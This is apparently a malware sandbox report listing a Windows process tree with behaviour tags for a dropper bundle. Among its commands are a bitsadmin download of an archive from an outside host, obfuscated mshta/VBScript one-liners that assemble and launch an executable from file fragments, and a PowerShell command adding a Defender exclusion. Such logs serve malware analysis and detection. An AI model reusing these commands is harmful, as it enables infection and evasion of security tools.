              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae884718
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae884718
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae884718
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae884718
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae884718
            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae884718
        C:\Users\Admin\AppData\Local\Temp\cb-64ac4-189-332b9-61110b00bfb18\Kajusushyxi.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\cb-64ac4-189-332b9-61110b00bfb18\Kajusushyxi.exe"
            C:\Windows\System32\cmd.exe
              cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ie1syora.vi5\GcleanerEU.exe /eufive & exit
                C:\Users\Admin\AppData\Local\Temp\ie1syora.vi5\GcleanerEU.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\ie1syora.vi5\GcleanerEU.exe /eufive
                    C:\Windows\SysWOW64\WerFault.exe
                      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 204
                      - Program crash
                      - Checks processor information in registry
            C:\Windows\System32\cmd.exe
              cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\installer.exe /qn CAMPAIGN="654" & exit
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
                C:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\installer.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\installer.exe /qn CAMPAIGN="654"
                  - Loads dropped DLL
                  - Enumerates connected drives
                  - Modifies system certificate store
                  - Suspicious use of FindShellTrayWindow
                    C:\Windows\SysWOW64\msiexec.exe
                      cmd: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633451195 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                      - Enumerates connected drives
                      - Checks processor information in registry
                      - Enumerates system info in registry
            C:\Windows\System32\cmd.exe
              cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jptme4q0.gry\any.exe & exit
                C:\Users\Admin\AppData\Local\Temp\jptme4q0.gry\any.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\jptme4q0.gry\any.exe
            C:\Windows\System32\cmd.exe
              cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2uvpasrm.kb2\gcleaner.exe /mixfive & exit
                C:\Windows\System32\Conhost.exe
                  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                C:\Users\Admin\AppData\Local\Temp\2uvpasrm.kb2\gcleaner.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\2uvpasrm.kb2\gcleaner.exe /mixfive
                    C:\Windows\SysWOW64\WerFault.exe
                      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6172 -s 256
                      - Program crash
                      - Checks processor information in registry
                      - Enumerates system info in registry
            C:\Windows\System32\cmd.exe
              cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmoa3cxd.r1n\autosubplayer.exe /S & exit
                C:\Users\Admin\AppData\Local\Temp\pmoa3cxd.r1n\autosubplayer.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\pmoa3cxd.r1n\autosubplayer.exe /S
                  - Loads dropped DLL
                  - Drops file in Program Files directory
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                        C:\Windows\System32\Conhost.exe
                          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                        C:\Windows\System32\Conhost.exe
                          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                      - Executes dropped EXE
                      - Checks for any installed AV software in registry
                    C:\Windows\SysWOW64\bitsadmin.exe
                      cmd: "bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z
                      - Download via BitsAdmin
                        C:\Windows\System32\Conhost.exe
                          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          - Suspicious use of SetThreadContext
                    C:\Program Files (x86)\lighteningplayer\data_load.exe
                      cmd: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pehbuAUvOgr0pPji -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                    C:\Program Files (x86)\lighteningplayer\data_load.exe
                      cmd: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p7MGCcRF8TyEcJi9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\rundll32.exe
                      cmd: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio
                        C:\Windows\system32\rundll32.exe
                          cmd: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio
                          - Drops file in System32 directory
                          - Drops file in Windows directory
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"
                    C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                      cmd: "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
C:\Windows\SysWOW64\cmd.exe
  cmd: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"
    C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
      cmd: SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
      - Executes dropped EXE
        C:\Windows\SysWOW64\mshta.exe
          cmd: "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
            C:\Windows\SysWOW64\cmd.exe
              cmd: "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
        C:\Windows\SysWOW64\mshta.exe
          cmd: "C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
            C:\Windows\SysWOW64\cmd.exe
              cmd: "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                C:\Windows\SysWOW64\cmd.exe
                  cmd: C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                C:\Windows\SysWOW64\cmd.exe
                  cmd: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                C:\Windows\SysWOW64\control.exe
                  cmd: control .\FUEj5.QM
                    C:\Windows\SysWOW64\rundll32.exe
                      cmd: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                      - Loads dropped DLL
                        C:\Windows\system32\RunDll32.exe
                          cmd: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                            C:\Windows\SysWOW64\rundll32.exe
                              cmd: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
    C:\Windows\SysWOW64\taskkill.exe
      cmd: taskkill -F -Im "Fri1034cd265b5e0adcd.exe"
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\rundll32.exe
  cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 456
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 456
      - Program crash
C:\Windows\system32\rundll32.exe
  cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4540 -ip 4540
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5232 -ip 5232
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3864 -ip 3864
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4588 -ip 4588
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4540 -ip 4540
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5304 -ip 5304
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4992 -ip 4992
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6176 -ip 6176
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5236 -ip 5236
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5512 -ip 5512
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4540 -ip 4540
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\Conhost.exe
  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5284 -ip 5284
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4540 -ip 4540
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\rundll32.exe
  cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
    C:\Windows\SysWOW64\rundll32.exe
      cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      - Loads dropped DLL
        C:\Windows\SysWOW64\WerFault.exe
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 448
          - Program crash
          - Checks processor information in registry
          - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3544 -ip 3544
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
  - Modifies data under HKEY_USERS
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4540 -ip 4540
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5024 -ip 5024
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4672 -ip 4672
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 5396 -ip 5396
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4540 -ip 4540
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5140 -ip 5140
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Users\Admin\AppData\Local\Temp\3A21.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\3A21.exe
  - Suspicious use of SetThreadContext
    C:\Users\Admin\AppData\Local\Temp\3A21.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\3A21.exe
      - Checks SCSI registry key(s)
      - Suspicious behavior: MapViewOfSection
C:\Users\Admin\AppData\Local\Temp\6180.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\6180.exe
  - Suspicious use of SetThreadContext
    C:\Users\Admin\AppData\Local\Temp\6180.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\6180.exe
    C:\Users\Admin\AppData\Local\Temp\6180.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\6180.exe
    C:\Users\Admin\AppData\Local\Temp\6180.exe
      cmd: C:\Users\Admin\AppData\Local\Temp\6180.exe
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7200 -ip 7200
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4660 -ip 4660
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6808 -ip 6808
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\vssvc.exe
  cmd: C:\Windows\system32\vssvc.exe
  - Checks SCSI registry key(s)
C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
C:\Users\Admin\AppData\Local\Temp\C193.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\C193.exe
    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 248
      - Program crash
      - Checks processor information in registry
C:\Users\Admin\AppData\Local\Temp\DAD8.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\DAD8.exe
  - Windows security modification
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
    C:\Users\Admin\AppData\Local\Temp\5fd5d6a5-215d-4ecb-a634-11958d21e1d5\AdvancedRun.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\5fd5d6a5-215d-4ecb-a634-11958d21e1d5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5fd5d6a5-215d-4ecb-a634-11958d21e1d5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5fd5d6a5-215d-4ecb-a634-11958d21e1d5\test.bat"
          - Suspicious use of NtCreateProcessExOtherParentProcess
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\DAD8.exe" -Force
    C:\Users\Admin\AppData\Local\Temp\DAD8.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\DAD8.exe"
        C:\Windows\System32\Conhost.exe
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 1812
      - Suspicious use of NtCreateProcessExOtherParentProcess
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 3104 -ip 3104
C:\Users\Admin\AppData\Local\Temp\2D3F.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\2D3F.exe
    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 256
      - Program crash
      - Enumerates system info in registry
C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of FindShellTrayWindow
C:\Users\Admin\AppData\Local\Temp\7229.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\7229.exe
    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 256
      - Program crash
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2552 -ip 2552
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7096 -ip 7096
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8008 -ip 8008
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
C:\Program Files\Windows Defender\mpcmdrun.exe
  cmd: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
C:\Windows\System32\CompPkgSrv.exe
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4540 -ip 4540
